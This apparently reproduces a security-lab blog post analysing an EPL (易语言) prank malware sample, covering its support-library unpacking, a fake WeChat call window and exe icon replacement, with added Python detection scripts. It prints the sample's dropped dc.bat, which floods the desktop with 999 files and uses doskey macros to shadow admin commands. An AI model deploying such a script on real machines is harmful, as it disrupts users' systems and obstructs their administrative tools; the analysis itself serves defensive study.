Posted by 无聊看看 on 2021-9-29 11:00:00

A Brief Analysis of an EPL (易语言) Phishing Sample Aimed at "High-Quality Women"

<p class="pgc-p" data-track="1" data-pm-slice="1 1 []"><strong>This is an original article by 合天网安实验室 (Hetian Network Security Lab); please credit the source when reposting!</strong></p>
<p data-track="1" data-pm-slice="0 0 []"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">I had never really analysed an EPL (易语言) sample and wanted to learn how that analysis goes. As it happens, I recently came across a sample written in EPL that phishes "high-quality human women", so I used it as a learning exercise. I was learning as I analysed, so please point out anything I got wrong.</span></p>
<p data-track="2"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">The sample's icon looks like this:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=YTliMjQyZTgxN2QzNDk1MDIwMzE5YzQ1YjE5NGU3NzcsMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="4"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">It seems to wear the same hairstyle as the "high-quality human male" meme that went around a while ago? Looking at the file details, the File description field even states "high-quality women please run":</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=OTkwM2Q2Y2M3OWI1YzM1OTFlMjQ2NTI1YjY0ODE5MmQsMTYzMjg4MzM1ODc4Mw=="></div>
<h1 class="pgc-h-arrow-right" data-track="6">Characteristics of EPL</h1>
<p data-track="7"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">To analyse an EPL program properly, you first need a rough idea of how EPL programs are written and compiled. EPL is a Chinese-language programming language that extends its functionality by wrapping "support libraries". A demo is shown below:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=NDQ3ZDk0ODZlMjhlMTAyYTBkODkxMWE1NjllM2NiOTAsMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="9"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">EPL has two main compilation modes:</span></p>
<p data-track="10"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">Stand-alone compilation: the program and the EPL support libraries are packed into a single exe file, so the program can run outside the EPL environment.</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MGUwNmRiNTFlMTAyZDA5MDNjYjFmNTkzMjgyM2NmNjIsMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="12"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">Non-stand-alone compilation: only the exe itself is compiled, which gives a much smaller file, but the support libraries must be shipped alongside it for the program to run.</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MGU5YWUyNThmMDI1MTIwNzQ3YTQyZGQ2ZTJjZWFiYjksMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="14"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">If a dependency library is missing, an error dialog pops up:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=NzJlZWUyN2Y0YjVhMzdmNzczZDlkYWQ2MWQ2OTliYjEsMTYzMjg4MzM1ODc4Mw=="></div>
<h1 class="pgc-h-arrow-right" data-track="16">Static Analysis of the Sample</h1>
<p data-track="17"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">With that background we can work out which compilation mode this sample uses. Loading it into IDA, the first thing we see is that the sample creates a folder whose name starts with E_N under the Temp directory and drops several PE files with .fnr and .fne extensions there.</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=YWMyN2E1YmNjYTYzY2Q2OTkzNzJkNjBlMjE4MmE4YzEsMTYzMjg4MzM1ODc4Mw=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=YjhkOTU1NDNmNmIyOWQyYjZjZDE5MDE5YTBiZGI3N2YsMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="19"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">It calls LoadLibrary and GetProcAddress to load the support library file and resolve the address of GetNewSock:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=ODJiNjlkOTNhNmI2ZTBhNjZiMmRjNjU3NGQ4YjIwNTgsMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="21"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">Further down there is a call eax followed by a MessageBox:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=M2JhZjM5MWUzOTAwYzJmN2NiNTYzNTE4N2UyODI4MzEsMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="23"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">These are all characteristic of how EPL loads its support libraries, and they show that this sample was compiled stand-alone. Next we go straight to dynamic analysis.</span></p>
<h1 class="pgc-h-arrow-right" data-track="25">Dynamic Analysis of the Sample</h1>
<p data-track="26"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">We debug the sample with 火绒剑 (Huorong Sword) together with OllyDbg, setting breakpoints on key APIs such as CreateFileA, MessageBoxA, CreateProcessA and CreateWindowExA. This reveals that, besides krnln.fnr, several other support library files are dropped:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MjQ3NzlmNTdiMjk5NmIxMDEzMWI2NjMyN2JlZDdiYWUsMTYzMjg4MzM1ODc4Mw=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=NjczZDMxODI1NDJkMWRlYzVlMDlkMWMwMDUzYzNkZmQsMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="29"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">Of these, eAPI.fne is the application interface support library, iext.fne the extended UI support library, krnln.fnr the system core support library, shell.fne the OS shell support library and spec.fne the special functions support library, while mp3.run, com.run and wmp.dll belong to the Windows Media Player support library. So this sample will probably play audio or video. Continuing execution we see:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MzhjOGU4ZjcwMDk5Mjk1NDkyNWQ4YzJlODcxM2Y4OWIsMTYzMjg4MzM1ODc4Mw=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=ZDgzZjQ5ODZhMzkzNGMyNmUyYTc2NGJjY2EyMDUwZTksMTYzMjg4MzM1ODc4Mw=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=ZGJhMTA2NzI2MmRkMTI5NzQ5MmQ4YjhiZWE2YzJlMjUsMTYzMjg4MzM1ODc4Mw=="></div>
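<p>The E_N temp folder and the support library names above give a defender a simple triage rule: a process that unpacks several known .fnr/.fne/.run files into an E_N folder under Temp is a stand-alone EPL build, and whatever else it writes next to them deserves a look. The following is an added example written for this page, not code from the article; the file-creation paths are constructed, and the E_N4 folder name is invented (the write-up only says the name starts with E_N).</p>

```python
import re
from pathlib import PureWindowsPath

# EPL support libraries named in the write-up, keyed by lower-case file name.
EPL_SUPPORT_LIBS = {
    "krnln.fnr": "system core support library",
    "eapi.fne": "application interface support library",
    "iext.fne": "extended UI support library",
    "shell.fne": "OS shell support library",
    "spec.fne": "special functions support library",
    "mp3.run": "Windows Media Player support library",
    "com.run": "Windows Media Player support library",
    "wmp.dll": "Windows Media Player support library",
}

# A stand-alone-compiled EPL binary unpacks its libraries at run time into a
# folder under Temp whose name starts with E_N; that prefix is the hook.
EPL_TEMP_DIR_RE = re.compile(r"(^|\\)temp\\e_n[^\\]*\\", re.IGNORECASE)

def classify_file_drop(path):
    """Return (library_role or None, created_inside_an_E_N_temp_folder)."""
    p = PureWindowsPath(path)
    return EPL_SUPPORT_LIBS.get(p.name.lower()), bool(EPL_TEMP_DIR_RE.search(str(p)))

def detect_epl_runtime_unpack(file_create_paths, min_libs=2):
    """Flag a process as a stand-alone EPL build when it writes at least
    min_libs known support libraries into an E_N folder under Temp, and list
    the other files written next to them (that is where the payload lives)."""
    libs, companions = [], []
    for path in file_create_paths:
        role, in_epl_dir = classify_file_drop(path)
        if in_epl_dir and role:
            libs.append((PureWindowsPath(path).name.lower(), role))
        elif in_epl_dir:
            companions.append(path)
    return {"is_epl_standalone": len(libs) >= min_libs,
            "support_libs": libs, "companion_files": companions}

# Constructed file-creation events (paths as a file monitor would report them);
# the E_N4 folder name is made up, the write-up only says it starts with E_N.
SAMPLE_EVENTS = [
    r"C:\Users\victim\AppData\Local\Temp\E_N4\krnln.fnr",
    r"C:\Users\victim\AppData\Local\Temp\E_N4\eAPI.fne",
    r"C:\Users\victim\AppData\Local\Temp\E_N4\shell.fne",
    r"C:\Users\victim\AppData\Local\Temp\E_N4\mp3.run",
    r"C:\Users\victim\AppData\Local\Temp\E_N4\dc.bat",
    r"C:\Users\victim\AppData\Local\Temp\E_N4\wallpaper.mp4",
    r"C:\Users\victim\Desktop\notes.txt",
]
```

<p>Run <code>detect_epl_runtime_unpack(SAMPLE_EVENTS)</code>: the four libraries mark the process as an EPL build and dc.bat and wallpaper.mp4 are reported as companion files, while the desktop text file is ignored.</p>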
<p data-track="33"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">It also drops and runs a bat file:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=NmFhNTM4MDc0Yzg0YjIxZDY5MjI2YTJhNGZlY2RhYTYsMTYzMjg4MzM1ODc4Mw=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MDljZmIxMTIwYmJiYWJiMTdmMzMzNzZkZmZjNGRlNmUsMTYzMjg4MzM1ODc4Mw=="></div>
<p data-track="36"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">dc.bat contains:</span></p>
<div class="cnblogs_code">
<pre>@echo off

cd c:\users\%username%\desktop\

for /L %%X IN (1,1,999) DO type nul&gt;人类高质量男性%%X.txt

doskey regedit=regedit.
doskey gpedit.msc= gpedit.Msc.
doskey gpedit= gpedit.Msc.
doskey net=net.
doskey mmc = mmc.
doskey mmc.exe = mmc.
doskey assoc=assoc.
doskey ftype=ftype.
doskey del = del.
doskey delete = del.
doskey RD = rd.</pre>
</div>
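<p>Two things stand out in dc.bat when you read it as a defender: a <code>for /L</code> loop that writes hundreds of files, and a run of <code>doskey</code> macros that redefine administrative commands (regedit, gpedit, net, mmc, del, rd and so on) for the current cmd session. The script below is an added example for this page, not code from the article; it statically triages a dropped batch file for exactly those two patterns, using the dc.bat text reproduced above as input. The 100-file threshold and the list of watched commands are assumptions.</p>

```python
import re

# dc.bat as dropped by the sample, copied from the write-up above (without the
# syntax-highlighting residue) and used here as the triage input.
DC_BAT = r"""@echo off
cd c:\users\%username%\desktop\
for /L %%X IN (1,1,999) DO type nul>人类高质量男性%%X.txt
doskey regedit=regedit.
doskey gpedit.msc= gpedit.Msc.
doskey gpedit= gpedit.Msc.
doskey net=net.
doskey mmc = mmc.
doskey mmc.exe = mmc.
doskey assoc=assoc.
doskey ftype=ftype.
doskey del = del.
doskey delete = del.
doskey RD = rd.
"""

# Admin tools and built-ins whose redefinition via doskey is suspicious: the
# macro changes what the user actually runs when typing the command in cmd.
ADMIN_COMMANDS = {"regedit", "gpedit", "gpedit.msc", "net", "mmc", "mmc.exe",
                  "assoc", "ftype", "del", "delete", "erase", "rd", "rmdir"}

DOSKEY_RE = re.compile(r"^\s*doskey\s+(?P<name>[^\s=]+)\s*=\s*(?P<body>.*)$", re.IGNORECASE)
FOR_L_RE = re.compile(
    r"^\s*for\s+/L\s+%%?(?P<var>\w)\s+in\s*\(\s*(?P<start>-?\d+)\s*,\s*(?P<step>-?\d+)"
    r"\s*,\s*(?P<end>-?\d+)\s*\)\s+do\s+(?P<cmd>.+)$", re.IGNORECASE)

def triage_batch(text, mass_write_threshold=100):
    """Report doskey macros that shadow admin commands and 'for /L' loops whose
    body redirects output to a file at least mass_write_threshold times."""
    findings = {"shadowed_commands": [], "mass_file_writes": []}
    for line in text.splitlines():
        m = DOSKEY_RE.match(line)
        if m:
            name = m.group("name").lower()
            if name in ADMIN_COMMANDS:
                findings["shadowed_commands"].append((name, m.group("body").strip()))
            continue
        m = FOR_L_RE.match(line)
        if m:
            start, step, end = (int(m.group(g)) for g in ("start", "step", "end"))
            iterations = 0 if step == 0 else max(0, (end - start) // step + 1)
            # '>' in the loop body creates or truncates one file per iteration
            if ">" in m.group("cmd") and iterations >= mass_write_threshold:
                findings["mass_file_writes"].append((iterations, m.group("cmd").strip()))
    return findings
```

<p>On dc.bat, <code>triage_batch(DC_BAT)</code> reports one loop of 999 file writes and eleven shadowed commands, which matches the 999 desktop files observed in the next step.</p>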
<p data-track="39"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">After it runs, 999 txt files appear on the desktop:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=ZDU0ZWYyN2NjNTQ1ZThkNjljOGVkYzVhYmI3OGQyYTYsMTYzMjg4MzM1ODc4NA=="></div>
<p data-track="41"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">At the same time, the following files are dropped in the temp directory:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=NjMyYmE5MjBhOTgzY2VkMmVkYWYzZDJhZmQ3ODVmMjQsMTYzMjg4MzM1ODc4NA=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=Mjg3OTg0MmViM2Y1N2I1M2ZlOThmYTU0NDc5MzI0ZDYsMTYzMjg4MzM1ODc4NA=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=ZTZjYjVjNTA4Yjk5NzU2NWQ3NWM2MWE3ZGJmN2ViYmYsMTYzMjg4MzM1ODc4NA=="></div>
<p data-track="45"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">Then a window imitating a WeChat voice call appears:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MDc1ZWU5NjZiMDUxYjljMzNjNjhhZjk2NmQ5NGM3ODgsMTYzMjg4MzM1ODc4NA=="></div>
<p data-track="47"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">When "answer" is clicked, audio and video are played:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MTE2NzE0ZjFmMzUxNGExZWNhNTgyNzk5MjRmN2U5OGIsMTYzMjg4MzM1ODc4NA=="></div>
<p data-track="49"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">To follow the behaviour triggered by the window we can use OllyDbg's windows view:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MmFhNDk4Y2VhNDEyZTA3OWYzNjk2NTkyYWFkNTA1ODEsMTYzMjg4MzM1ODc4NA=="></div>
<p data-track="51"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">Set a message breakpoint on the button; when the corresponding event fires, execution stops in the message handler.</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=OGIzMmFkZWJjNDAwOTFlOGMzODkwNGM1OWQxNDI2NTYsMTYzMjg4MzM1ODc4NA=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MjYxN2Q3N2MxMzc3NTViNzgxMGViZDNkNzdmZGFhNDcsMTYzMjg4MzM1ODc4NA=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MjgxZmJiYmIzYjQ0MTAzNWYzOWQyZGQ4OTAyNGZhOTAsMTYzMjg4MzM1ODc4NA=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MDhlNmY4ZGJlMzJjNGY0NWZjMTY3NWYxNGUzN2RkYmIsMTYzMjg4MzM1ODc4NA=="></div>
<p data-track="55"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">After that it exits.</span></p>
<p data-track="56"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">If the WeChat call is declined instead, the prank kicks in: the screen breaks up into "tiles" and wallpaper.mp4 is played:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=NzkxNDg0YzgyYWJiNDFlYTYxOTMxNGZkMjBhN2I0MjAsMTYzMjg4MzM1ODc4NA=="></div>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=MGFhNTJkNzBmNTk1NjFhNzcyYTc4ZDBiMTA0OTM1NjEsMTYzMjg4MzM1ODc4NA=="></div>
<p data-track="60"><span style="color: rgba(51, 51, 51, 1); --tt-darkmode-color: #A3A3A3">It also replaces the icons of all exe files, much as the Panda Burning Incense (熊猫烧香) worm did:</span></p>
<div class="pgc-img"><img src="https://mp.toutiao.com/mp/agw/article_material/open_image/get?code=ZWJhMWZkZjYwOTU1MzE0MjY2YTI3NjM2Njg2NDhmNzYsMTYzMjg4MzM1ODc4NA=="></div>
<p data-track="62">These functions are mainly implemented by the dropped FZ%.exe. Anyone interested can ask me for the sample and analyse it further, but be sure to run it only in a virtual machine and take a snapshot beforehand.</p>
Source: https://www.cnblogs.com/hetianlab/p/15351861.html